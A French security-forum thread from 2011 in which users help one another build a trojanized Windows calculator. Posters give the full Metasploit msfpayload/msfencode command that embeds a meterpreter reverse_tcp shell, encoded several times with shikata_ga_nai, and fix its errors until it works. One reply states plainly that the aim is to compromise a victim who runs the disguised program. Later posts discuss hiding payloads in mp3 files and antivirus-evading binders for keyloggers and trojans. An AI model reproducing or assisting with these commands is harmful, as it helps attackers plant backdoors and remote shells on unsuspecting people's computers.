Probleme encodage metasploit

goliate · 13-09-2011 20:22:31

Salut j'ai un petit soucis pour suivre ce tuto :lien du tuto

J'ai tester sous bt 5 r1 voila le retour:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R  |./msfencode -t exe -x /home/goliatecalc.exe -k -o /home/goliatecalc_pro.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[-] x86/shikata_ga_nai failed: No such file or directory - /home/goliatecalc.exe
[-] No encoders succeeded.

J'ai le même résultat sous ubuntu 11.04 avec metasploit MAJ par le svn,quelqu'un a une idée pour que je puise encoder un .exe, ou sur mon problème?

antares145 · 13-09-2011 20:47:06

Le tuto que tu cites sert à incruster un backdoor dans un .EXE sain, par exemple la calculatrice Windows. Ainsi, quand la victime lance son programme en apparence innocent, elle se retrouve p'wnée jusqu'à l'os... smile

Le truc, c'est que pour pouvoir incruster ton backdoor dans un EXE sain, il te faut... un EXE sain ! Que tu ne sembles pas avoir puisqu'il te met que ce fichier (l'argument de "-x") n'existe pas wink

Télécharge la calculatrice Windows, renomme-la en /home/goliatecalc.exe et relance la commande ça devrait passer smile

goliate · 13-09-2011 20:54:58

Merci de ta réponse, enfaîte en me relisant j'ai vu que je me suis planter dans la syntaxe ><.

Bon sinon j'ai dl un autre log.exe mais la il me sort un erreur que je ne connaît pas:

[email protected]:/home/goliate/pentest/metasploit# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R  |./msfencode -t exe -x /home/goliate/calc.exe -k -o /home/goliate/calc_pro.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[-] x86/shikata_ga_nai failed: Junk at end of file. Is this a packed exe?
[-] No encoders succeeded.

antares145 · 13-09-2011 20:58:56

[-] x86/shikata_ga_nai failed: Junk at end of file. Is this a packed exe?
[-] No encoders succeeded.

Ca peut avoir 2 origines :
- le .EXE de base (celui qui est sain) est bizarre ou compressé, donc l'encodage se vautre
- tu as tellement encodé ton exécutable qu'il devient illisible
(je penche pour la première solution)

goliate · 13-09-2011 21:06:24

antares145 a écrit :

[-] x86/shikata_ga_nai failed: Junk at end of file. Is this a packed exe?
[-] No encoders succeeded.
Ca peut avoir 2 origines :
- le .EXE de base (celui qui est sain) est bizarre ou compressé, donc l'encodage se vautre
- tu as tellement encodé ton exécutable qu'il devient illisible
(je penche pour la première solution)

Je pense plus comme toi bon il ne me reste plus qu'a trouvé un .exe exploitable ^^.

Au passage je voulais savoir si il était possible de faire la même chose avec des fichier autre CAD (.avi .mp3), je voudrais implanter un playload dans un mp3.

antares145 · 13-09-2011 21:11:15

Là c'est un binder qu'il te faut, pour "lier" les 2 fichiers, parce que le fichier de base n'est pas exécutable. Je n'en connais pas comme ça mais c'est pas très difficile à trouver. Un bon binder par contre, du genre qui ne fait pas hurler l'antivirus, c'est + rare smile

Il y a la technique de iexpress aussi (intégré à Windows), mais là ça "transforme" ton fichier de base en EXE qui lance les 2 (le fichier de base et le backdoor) --> How to bind or attach a keylogger or trojan with other file (iexpress Tutorial)

goliate · 14-09-2011 08:51:35

Je te remercie pour tes renseignement antares

Jack Sparrow · 14-09-2011 11:59:50

Il y a la technique de iexpress aussi (intégré à Windows), mais là ça "transforme" ton fichier de base en EXE qui lance les 2 (le fichier de base et le backdoor) --> How to bind or attach a keylogger or trojan with other file (iexpress Tutorial)

Super tuto, merci pour le lien antares! smile

goliate · 14-09-2011 17:14:43

Merci j'ai regarder le lien mais bon je me mefie des log kiddie ^^.Mais merci de m'avoir donner la marche a suivre

goliate · 15-09-2011 21:00:48

Je voulais savoir si quelqu'un a réusit sa avec BT 5?

Fuji · 15-09-2011 21:53:42

Ca fonctionne sur BT5 R1 wink

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R  |./msfencode -t exe -x /home/calc.exe -k -o /home/calc_pro.exe -e x86/shikata_ga_nai -c 5

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

goliate · 15-09-2011 22:21:40

tu a tester avec quel .exe Fuji stp?

Fuji · 15-09-2011 22:35:47

Et bien la calculatrice Windows comme toi smile

goliate · 15-09-2011 22:39:20

Fuji a écrit :

Et bien la calculatrice Windows comme toi

ok merci pour info tu a update metasploit?
Bon la j'ai tester d'encoder le .exe de wow ( et oui je l'avais sous la main ><) et sous ma ubuntu sa a fonctionné je v voir sous bt.
Merci fuji

Dernière modification par goliate (15-09-2011 22:41:41)

Fuji · 15-09-2011 22:41:30

Non j'ai pas fais une mise à jour, et puis d'ailleurs ça n'a rien à voir avec cette m-à-jour puisque Metasploit s'est le faire depuis longtemps, à savoir encoder et intégrer meterpreter dans un autre fichier.exe.

Dernière modification par Fuji (15-09-2011 22:57:44)

goliate · 15-09-2011 22:46:45

ok merci j'ai edit mon post du dessus

Discussion	Réponses	Vues	Dernier message
problème je ne capte pas de station par mlt	1	124	15-08-2017 10:55:58 par koala
[tuto metasploit] php payloads par JeanCharles	2	550	11-07-2017 21:00:14 par JeanCharles
Problème: aucune adresse mac autorisée sur mon router wifi D-Link par samireln	4	720	09-07-2017 20:25:32 par M1ck3y
metasploit par didier	1	567	06-07-2017 17:25:54 par Olympe
[probleme] mon fake ap saute par moumoufle	2	827	02-07-2017 12:38:10 par moumoufle

Crack-wifi.com FORUM

Annonce

#1 13-09-2011 20:22:31